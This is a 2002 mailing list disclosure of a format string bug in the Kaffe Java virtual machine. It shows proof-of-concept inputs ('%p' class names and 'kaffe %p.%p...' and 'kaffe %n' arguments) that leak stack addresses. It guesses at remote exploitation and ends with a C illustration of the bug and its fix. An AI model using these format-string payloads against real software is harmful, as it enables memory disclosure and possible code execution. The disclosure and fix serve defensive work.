Vulnerability Development mailing list archives

Latest Kaffe Java Virtual Machine Format Strings issue.


From: KF <dotslash () snosoft com>
Date: Tue, 05 Mar 2002 12:07:17 -0500

Ok I sent this out twice already... I don't know what happened... I got zero response from vuln-dev or from the Vendor for that matter... so let's try again... The latest version of kaffe JVM and most of the older versions I tested are vulnerable to a format string attack... Below are 2 local examples... one from the java command line and one malicious class file. Perhaps this could be remotely exploited via a servlet engine or something that serves out jsp pages... maybe even a malicious .class could take advantage of it (example provided) with java.lang.Class.forName(). I think it needs to be addressed either way. This was sent to the kaffe authors' email address with no response, as well as posted on their bug-tracking forum thing, which I can't seem to figure out how to navigate... so there was an attempt at vendor notification.
-KF

[root@localhost root]# cat > test.java
class test
{
       public static void main(String args[])
       throws Exception
       {
               Class c = Class.forName("%p");
       }
}

[root@localhost root]# javac test.java
[root@localhost root]# java test
java.lang.NoClassDefFoundError: 0x4003256a <---------------- note the memory address here.
       at java.lang.Class.forName(Class.java:native)
       at java.lang.Class.forName(Class.java:52)
       at test.main(test.java:6)

[root@localhost root]# rpm -ivh kaffe-1.0.6-6.i386.rpm
Preparing...                ########################################### [100%]
   1:kaffe                  ########################################### [100%]
[root@localhost root]# which kaffe
/usr/bin/kaffe
[root@localhost root]# kaffe -version
Kaffe Virtual Machine
Copyright (c) 1996-2000
Transvirtual Technologies, Inc.  All rights reserved
Engine: Just-in-time v3   Version: 1.0.6   Java Version: 1.1
[root@localhost root]# kaffe %p.%p.%p.%p.%p
java.lang.NoClassDefFoundError: 0x4003256a/0x4006fa14/0xbfffee98/0xbfffed80/0x40033910
       at java.lang.Class.forName(Class.java:native)
       at java.lang.Class.forName(Class.java:52)
[root@localhost root]# kaffe %n

-KF
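The bug class behind the output above, as an added illustration that is not Kaffe's code and does not claim to be its actual error path: a logging helper that forwards its format to vsnprintf, a caller that passes the attacker-chosen class name as that format (so "%p" gets expanded, as in the report), and the hardened form that passes the name as a "%s" argument. The helper and function names are assumptions for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical logging helper in the style of a JVM's error path. It has no
 * __attribute__((format(printf, 3, 4))), so -Wformat-security cannot see
 * that a caller is feeding it a non-literal format with no arguments. */
static int log_msg(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* Vulnerable form: the class name is baked into the message first and the
 * result is then used as the format, so "%p" in the name gets interpreted,
 * which is exactly what the addresses in the report's output show. */
int class_not_found_unsafe(const char *name, char *out, size_t n)
{
    char msg[256];
    snprintf(msg, sizeof msg, "java.lang.NoClassDefFoundError: %s", name);
    return log_msg(out, n, msg);           /* BUG: user data as format */
}

/* Hardened form: fixed format, name passed as a "%s" argument. Any '%' in
 * the name is now copied literally instead of being parsed. */
int class_not_found_safe(const char *name, char *out, size_t n)
{
    return log_msg(out, n, "java.lang.NoClassDefFoundError: %s", name);
}

/* Regression check: returns 1 if the name appears verbatim in the message,
 * 0 if the formatter consumed any of it. */
int name_survives(int (*fn)(const char *, char *, size_t), const char *name)
{
    char out[512];
    fn(name, out, sizeof out);
    return strstr(out, name) != NULL;
}

int main(void)
{
    char out[512];
    class_not_found_safe("%p.%p", out, sizeof out);
    puts(out);   /* java.lang.NoClassDefFoundError: %p.%p */
    return 0;
}
```

The name_survives check is the kind of test a maintainer can add so the fix cannot silently regress; the unsafe path fails it for any name containing a conversion specifier.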


